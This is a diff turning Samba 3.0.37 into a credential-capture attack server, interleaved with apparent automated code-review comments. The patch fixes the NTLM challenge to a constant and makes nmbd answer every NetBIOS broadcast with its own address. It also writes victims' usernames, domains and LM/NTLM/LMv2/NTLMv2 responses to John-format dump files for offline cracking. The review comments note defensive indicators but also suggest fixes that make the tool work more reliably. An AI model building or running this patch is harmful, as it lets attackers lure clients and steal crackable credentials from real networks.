diff -rubN samba-3.0.37/source/auth/auth.c samba-3.0.37-jmk/source/auth/auth.c
--- samba-3.0.37/source/auth/auth.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/auth/auth.c	2010-02-10 15:53:06.779889636 -0600
@@ -124,14 +124,19 @@
 	}
 	
 	if (!challenge_set_by) {
-		uchar chal[8];
+		uchar chal[8] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 };
+		int i;
 		
-		generate_random_buffer(chal, sizeof(chal));
 		auth_context->challenge = data_blob_talloc(auth_context->mem_ctx, 
 							   chal, sizeof(chal));
 		
-		challenge_set_by = "random";
-		auth_context->challenge_may_be_modified = True;
+    challenge_set_by = "jmk";
+    auth_context->challenge_may_be_modified = False;
+    DEBUG(0, ("*** Fixed LM/NTLM Challenge Samba Attack -- Foofus.Net/JoMo-Kun ***\n")); 
+    DEBUGADD(0, ("[%s] Set server challenge: ", client_addr()));
+    for (i=0; i<auth_context->challenge.length; i++)
+      DEBUGADD(0, ("%2.2X", 0xFF & (int)auth_context->challenge.data[i]));
+    DEBUGADD(0, ("\n"));
 	} 
 	
 	DEBUG(5, ("auth_context challenge created by %s\n", challenge_set_by));
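Review bot: The replacement of `generate_random_buffer()` with the constant initialiser on `chal` is unconditional, so any binary built from this tree hands every client the same 8-byte challenge and the freshness that LM/NTLM challenge-response depends on is gone; nothing in the code says that such a build must never serve as a real file server. I would put a comment above the declaration, e.g. `/* TEST BUILD ONLY: constant challenge disables replay protection and exposes captured responses to precomputed-table attacks */`, and keep the original random call behind a compile-time switch. For defenders the same constant is useful: a server that returns `1122334455667788` as its challenge on every connection is a strong network indicator of this patch. The loop also compares the signed `int i` with `auth_context->challenge.length`; declaring it as `size_t i;` avoids the mixed-sign comparison, assuming the length field is unsigned. The enclosing function starts and ends outside the hunk.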
diff -rubN samba-3.0.37/source/nmbd/nmbd.c samba-3.0.37-jmk/source/nmbd/nmbd.c
--- samba-3.0.37/source/nmbd/nmbd.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/nmbd/nmbd.c	2010-02-10 15:53:06.779889636 -0600
@@ -722,6 +722,9 @@
 
 	DEBUG( 0, ( "Netbios nameserver version %s started.\n", SAMBA_VERSION_STRING) );
 	DEBUGADD( 0, ( "%s\n", COPYRIGHT_STARTUP_MESSAGE ) );
+  DEBUGADD(0, ("\n----------------------------------------------------------\n"));
+  DEBUGADD(0, ("*** NMB Broadcast Auto-Response -- Foofus.Net/JoMo-Kun ***\n"));
+  DEBUGADD(0, ("----------------------------------------------------------\n\n"));
 
 	if ( !reload_nmbd_services(False) )
 		return(-1);
diff -rubN samba-3.0.37/source/nmbd/nmbd_incomingrequests.c samba-3.0.37-jmk/source/nmbd/nmbd_incomingrequests.c
--- samba-3.0.37/source/nmbd/nmbd_incomingrequests.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/nmbd/nmbd_incomingrequests.c	2010-02-11 13:07:23.926474545 -0600
@@ -449,18 +449,55 @@
 	struct name_record *namerec = NULL;
 	int reply_data_len = 0;
 	int i;
+  int num_ips;	
 	
 	DEBUG(3,("process_name_query_request: Name query from %s on subnet %s for name %s\n", 
 		 inet_ntoa(p->ip), subrec->subnet_name, nmb_namestr(question)));
   
+  /* ********************************************************************************* */
+  /* 
+     Hack to make nmbd respond with our IP for all NMB broadcasts.
+     Based on ideas from Karma (http://www.theta44.org/karma/). 
+     JoMo-Kun <jmk@foofus.net> [02/2007]
+  */
+ 
 	/* Look up the name in the cache - if the request is a broadcast request that
 	   came from a subnet we don't know about then search all the broadcast subnets
 	   for a match (as we don't know what interface the request came in on). */
 
+  /*
 	if(subrec == remote_broadcast_subnet)
 		namerec = find_name_for_remote_broadcast_subnet( question, FIND_ANY_NAME);
 	else
 		namerec = find_name_on_subnet(subrec, question, FIND_ANY_NAME);
+  */
+
+  /* Create Response Packet */
+  DEBUGADD(0, ("[%s] NetBIOS Broadcast Request: %s\n", inet_ntoa(p->ip), question->name) );
+
+  /* Don't respond to broadcasts which match our ignore list */
+  //if ( strcmp(inet_ntoa(p->ip), "10.71.0.160") == 0 )
+  //{
+  //  DEBUGADD(0, ("[%s] Skipping NetBIOS Broadcast Request based on host ignore list.\n", inet_ntoa(p->ip)) );
+  //  namerec = NULL;
+  //}
+  //else
+  //{
+    namerec = SMB_MALLOC_P(struct name_record);
+    memset( (char *)namerec, '\0', sizeof(*namerec) );
+    namerec->subnet = subrec;
+    make_nmb_name(&namerec->name, question->name, 0x00);
+    namerec->data.nb_flags = NB_ACTIVE;
+    namerec->data.wins_flags = WINS_ACTIVE;
+    namerec->data.nb_flags = NB_PERM;
+    namerec->data.source = SELF_NAME;
+    num_ips = iface_count(); 
+    namerec->data.num_ips = num_ips;
+    namerec->data.ip = SMB_MALLOC_ARRAY( struct in_addr, num_ips );
+    memcpy( (namerec->data.ip), &subrec->myip, num_ips * sizeof(struct in_addr) );
+  //}
+
+  /* ********************************************************************************* */
 
 	/* Check if it is a name that expired */
 	if (namerec && 
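Review bot: The `memcpy` into `namerec->data.ip` copies `num_ips * sizeof(struct in_addr)` bytes starting at `&subrec->myip`, which looks like the address of a single `struct in_addr`; with more than one interface it reads past that field and places whatever follows it in the subnet record into the reply. Neither `SMB_MALLOC_P` nor `SMB_MALLOC_ARRAY` is checked before the `memset`/`memcpy`, the record is allocated on every query with no free visible in the hunk, and `nb_flags = NB_ACTIVE` is immediately overwritten by `nb_flags = NB_PERM` (probably `NB_ACTIVE | NB_PERM` was meant). The minimal change for the copy is `namerec->data.num_ips = 1;` together with `memcpy(namerec->data.ip, &subrec->myip, sizeof(struct in_addr));`. Because the normal lookup is commented out, the daemon claims every queried name, so on a monitored network a host that answers broadcast queries for names that do not exist is the behaviour to alert on. The function continues past the end of the hunk, so the ownership of `namerec` cannot be confirmed from here.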
diff -rubN samba-3.0.37/source/smbd/negprot.c samba-3.0.37-jmk/source/smbd/negprot.c
--- samba-3.0.37/source/smbd/negprot.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/smbd/negprot.c	2010-02-10 15:53:06.779889636 -0600
@@ -349,6 +349,7 @@
 		p += srvstr_push(outbuf, p, lp_workgroup(), BUFFER_SIZE - (p-outbuf), 
 				 STR_UNICODE|STR_TERMINATE|STR_NOALIGN);
 		DEBUG(3,("not using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Disabled.\n", client_addr()));
 	} else {
 		DATA_BLOB spnego_blob = negprot_spnego();
 
@@ -362,6 +363,7 @@
 
 		SCVAL(outbuf,smb_vwv16+1, 0);
 		DEBUG(3,("using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Enabled (NTLMv2).\n", client_addr()));
 	}
 	
 	SSVAL(outbuf,smb_vwv17, p - q); /* length of challenge+domain strings */
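Review bot: The added message claims "(NTLMv2)" whenever the SPNEGO branch is taken, but as far as the visible lines show this branch only means a SPNEGO blob was offered; which NTLM variant the client then uses is not known at this point, so the log line can mislead whoever reads it later. It also spells the mechanism "SPNEG", as does the line added in the previous hunk, while the adjacent `DEBUG(3, ...)` lines say SPNEGO. I would change the text to `"[%s] SPNEGO (extended security) offered.\n"` here and to `"[%s] SPNEGO not offered.\n"` in the earlier hunk. Both hunks sit inside a function whose start and end are outside the view.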
@@ -604,8 +606,9 @@
 		reload_services(True);          
 		outsize = supported_protocols[protocol].proto_reply_fn(inbuf, outbuf);
 		DEBUG(3,("Selected protocol %s\n",supported_protocols[protocol].proto_name));
+		DEBUGADD(0,("[%s] Selected protocol: %s\n", client_addr(), supported_protocols[protocol].proto_name));
 	} else {
-		DEBUG(0,("No protocol supported !\n"));
+		DEBUG(0,("[%s] No protocol supported !\n", client_addr()));
 	}
 	SSVAL(outbuf,smb_vwv0,choice);
   
diff -rubN samba-3.0.37/source/smbd/reply.c samba-3.0.37-jmk/source/smbd/reply.c
--- samba-3.0.37/source/smbd/reply.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/smbd/reply.c	2010-02-10 15:53:06.779889636 -0600
@@ -323,6 +323,9 @@
 		DEBUG(2,("netbios connect: name1=%s name2=%s\n",
 			 name1,name2));      
 
+    DEBUGADD(0, ("[%s] Server NetBIOS Name: %s\n", client_addr(), name1));
+    DEBUGADD(0, ("[%s] Client NetBIOS Name: %s\n", client_addr(), name2));
+
 		set_local_machine_name(name1, True);
 		set_remote_machine_name(name2, True);
 
@@ -503,6 +506,7 @@
 		
 	p += srvstr_pull(inbuf, client_devicetype, p, sizeof(client_devicetype), 6, STR_ASCII);
 
+  DEBUGADD(0, ("[%s] Device Type: %s Share: %s\n", client_addr(), client_devicetype, service));
 	DEBUG(4,("Client requested device type [%s] for share [%s]\n", client_devicetype, service));
 
 	conn = make_connection(service,password,client_devicetype,vuid,&nt_status);
diff -rubN samba-3.0.37/source/smbd/sesssetup.c samba-3.0.37-jmk/source/smbd/sesssetup.c
--- samba-3.0.37/source/smbd/sesssetup.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/smbd/sesssetup.c	2010-02-10 22:38:04.296497206 -0600
@@ -1302,7 +1302,12 @@
 		char *p = smb_buf(inbuf);    
 		char *save_p = smb_buf(inbuf);
 		uint16 byte_count;
-			
+		int i;	
+		int chars_to_copy = 0;	
+		char *pathname;
+		char *filename;
+		char *tempname;
+		FILE *fp;
 
 		if(global_client_caps == 0) {
 			global_client_caps = IVAL(inbuf,smb_vwv11);
@@ -1358,6 +1363,48 @@
 		if (doencrypt) {
 			lm_resp = data_blob(p, passlen1);
 			nt_resp = data_blob(p+passlen1, passlen2);
+
+      if (passlen2 > 24) /* LMv2 */
+      {
+        DEBUGADD(0, ("[%s] LM Client Response: ", client_addr()));
+        for (i=0; i<16; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+   
+        DEBUGADD(0, ("\n[%s] LM Client Challenge: ", client_addr()));
+        for (i=16; i<passlen1; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+   
+        DEBUGADD(0, ("\n"));
+      }
+      else /* LM */ 
+      {
+        DEBUGADD(0, ("[%s] LM Client Response: ", client_addr()));
+        for (i=0; i<passlen1; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+      
+        DEBUGADD(0, ("\n"));
+      }
+
+      if (passlen2 > 24)  /* NTLMv2 */ 
+      {
+        DEBUGADD(0, ("[%s] NT Client Response: ", client_addr()));
+        for (i=0; i<16; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+   
+        DEBUGADD(0, ("\n[%s] NT Client Challenge: ", client_addr()));
+        for (i=16; i<passlen2; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+
+       DEBUGADD(0, ("\n"));
+      }
+      else /* NTLM */
+      {
+        DEBUGADD(0, ("[%s] NT Client Response: ", client_addr()));
+        for (i=0; i<passlen2; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+        
+        DEBUGADD(0, ("\n"));
+      }
 		} else {
 			pstring pass;
 			BOOL unic=SVAL(inbuf, smb_flg2) & FLAGS2_UNICODE_STRINGS;
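Review bot: The first added `if (passlen2 > 24)` decides how to print the LM field from the length of the NT field and then reads a fixed 16 bytes from `p` without looking at `passlen1`; when a client sends an NT response longer than 24 bytes together with a short or empty LM response, the "LM Client Response" line is filled with bytes that belong to the NT response. Guarding it as `if (passlen2 > 24 && passlen1 >= 16)` keeps the label honest. Separately, all of these lines are written at debug level 0, so password-equivalent challenge/response material lands in the main daemon log regardless of the configured log level, and that log needs the same access restrictions as the dump files. Whether `passlen1` and `passlen2` were bounded against the packet earlier in the function is outside the hunk.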
@@ -1400,6 +1447,155 @@
 		else 
 			fstrcpy( primary_domain, "null" );
 
+    DEBUGADD(0, ("[%s] Client Name: %s Remote Machine Name: %s\n", client_addr(), client_name(), get_remote_machine_name()));
+    DEBUGADD(0, ("[%s] User: %s\n", client_addr(), user));
+    DEBUGADD(0, ("[%s] Domain: %s\n", client_addr(), domain));
+    DEBUGADD(0, ("[%s] Primary Domain: %s\n", client_addr(), primary_domain));
+    DEBUGADD(0, ("[%s] Native OS: %s\n", client_addr(), native_os));
+    DEBUGADD(0, ("[%s] Native LanMan: %s\n", client_addr(), native_lanman));
+
+    /* Log LM/NTLM/LMv2/NTLMv2 Challenge/Response in John Format */
+    if ( doencrypt ) {
+      DEBUGADD(0,("\n*** Logging LM/NTLM/LMv2/NTLMv2 Challenge/Response Exchanges to File (John/jtr Format) ***\n"));
+
+      /* Set Logging Path */
+      if ( strlen(lp_logfile()) != 0 )
+      {
+        filename = lp_logfile();
+        tempname = strrchr(filename, '/');
+        pathname = malloc(tempname - filename + 1);
+        memset(pathname, 0, tempname - filename + 1);
+        strncpy(pathname, filename, tempname - filename);
+      }
+      else
+      {
+        pathname = malloc(5);
+        memset(pathname, 0, 5);
+        snprintf(pathname, 4, "/tmp");
+      }
+
+      /* Set Log File Name */
+      if ((lm_resp.length == 24) && (nt_resp.length != 24))
+      {
+        /* Windows 7 LMv2 Response: 00000000000000000000000000000000 */
+        if (lm_resp.data[0] == 0x00) /* Extract NTLMv2 */
+        {
+          filename = malloc(strlen(pathname) + 15 + 1);
+          memset(filename, 0, strlen(pathname) + 15 + 1);
+          snprintf(filename, strlen(pathname) + 15 + 1, "%s/dump.NETNTLMv2", pathname);
+        }
+        else /* Extract LMv2 */
+        {
+          filename = malloc(strlen(pathname) + 13 + 1);
+          memset(filename, 0, strlen(pathname) + 13 + 1);
+          snprintf(filename, strlen(pathname) + 13 + 1, "%s/dump.NETLMv2", pathname);
+        }
+      }
+      else if ((lm_resp.length == 24) && (nt_resp.length == 24))
+      {
+        filename = malloc(strlen(pathname) + 11 + 1);
+        memset(filename, 0, strlen(pathname) + 11 + 1);
+        snprintf(filename, strlen(pathname) + 11 + 1, "%s/dump.NETLM", pathname);
+      }
+      else
+      {
+        DEBUGADD(0,("Failed to identify LM/NTLM/LMv2/NTLMv2 hashes based on length.\n"));
+        filename = NULL;
+      }
+
+      DEBUGADD(0,("Set LM/NTLM/LMv2/NTLMv2 Dump File:%s\n", filename));
+      free(pathname);
+
+      fp = fopen(filename, "a");
+      if (fp == NULL) {
+        DEBUGADD(0, ("Failed to Open Dump File.\n"));
+      }
+      /* Log LMv2/NTLMv2 Challenge/Response */
+      /* USER::DOMAIN:1122334455667788:498B5E245BAFA65E56334B28E3F501CF:6FE8BB5B66ED5892 */
+      else if ((lm_resp.length == 24) && (nt_resp.length != 24))
+      {
+        DEBUGADD(0,("Dumping LMv2/NTLMv2 Response\n"));
+        
+        /* Client Username */
+        fprintf(fp, "%s::", user);
+
+        /* Client Domain */
+        if (strlen(domain) != 0)
+          fprintf(fp, "%s:", domain);
+        else
+          fprintf(fp, ":");
+    
+        /* Fixed Server Challenge */
+        fprintf(fp, "1122334455667788:");
+
+        /* Windows 7 LMv2 Response: 00000000000000000000000000000000 -- Record NTLMv2 Instead */
+        if (lm_resp.data[0] == 0x00)
+        {
+          /* CLient NTLMv2 Response */
+          for (i=0; i<16; i++)
+            fprintf(fp, "%2.2X", (0xFF & (int)nt_resp.data[i]));
+ 
+          fprintf(fp, ":"); 
+
+          /* Client NTLMv2 Challenge */
+          for (i=16; i<passlen2;i++)
+            fprintf(fp, "%2.2X", (0xFF & (int)nt_resp.data[i]));
+        }
+        else
+        {
+          /* CLient LMv2 Response */
+          for (i=0; i<16; i++)
+            fprintf(fp, "%2.2X", (0xFF & (int)lm_resp.data[i]));
+    
+          fprintf(fp, ":"); 
+
+          /* Client LMv2 Challenge */
+          for (i=16; i<passlen1;i++)
+            fprintf(fp, "%2.2X", (0xFF & (int)lm_resp.data[i]));
+        }
+
+        fprintf(fp, "\n");
+
+        fclose(fp);
+      }
+      /* Log LM/NTLM Challenge/Response */
+      /* USER::DOMAIN:1122334455667788:E70F85C227FB0ED25AAE68715B54FA4E:BFC5ACEC40927AEF */
+      else if ((lm_resp.length == 24) && (nt_resp.length == 24))
+      {
+        DEBUGADD(0,("Dumping LM/NTLM Response\n"));
+
+        /* Client Username */
+        fprintf(fp, "%s::", user);
+
+        /* Client Domain */
+        if (strlen(domain) != 0)
+          fprintf(fp, "%s:", domain);
+        else
+          fprintf(fp, ":");
+    
+        /* Client LM Response */
+        for (i=0; i<passlen1; i++)
+          fprintf(fp,"%2.2X", 0xFF & (int)lm_resp.data[i] );
+       
+        fprintf(fp, ":"); 
+        
+        /* Client NTLM Response */
+        for (i=0; i<passlen1; i++)
+          fprintf(fp,"%2.2X", 0xFF & (int)nt_resp.data[i] );
+        
+        /* Fixed Server Challenge */
+        fprintf(fp, ":1122334455667788\n");
+
+        fclose(fp);
+      }
+       
+      DEBUGADD(0, ("\n*** Completed Dumping Challenge/Response ***\n"));
+    }
+    else
+      DEBUGADD(0, ("\n*** Memory Allocation Failure! ***\n"));
+    
+    /* response dumping code ends */
+
 		DEBUG(3,("Domain=[%s]  NativeOS=[%s] NativeLanMan=[%s] PrimaryDomain=[%s]\n",
 			 domain, native_os, native_lanman, primary_domain));
 
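Review bot: When the response lengths match neither known pair, `filename` is set to `NULL` and is then passed to `DEBUGADD(0,("...%s\n", filename))` and to `fopen(filename, "a")`, both undefined behaviour; the open and everything after it should sit under `if (filename != NULL)`. The path setup has the same kind of gap: `strrchr(filename, '/')` returns `NULL` for a log file setting without a slash, none of the `malloc` results are checked, `snprintf(pathname, 4, "/tmp")` stores only `/tm` (the size should be `5`), and the allocated `filename` is never freed. The closing `else` pairs with `if ( doencrypt )`, so "Memory Allocation Failure!" is printed for every session that does not use encrypted passwords (the enclosing function begins and ends outside this hunk). `user` and `domain` come from the client and are written with a bare `%s` into a colon-separated record, so a `:` or a newline in either can split or forge entries. The dump file is created with plain `fopen` in the log directory or `/tmp`, so it gets a predictable name and the process umask; material of this sensitivity should be created owner-only and outside world-writable directories.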
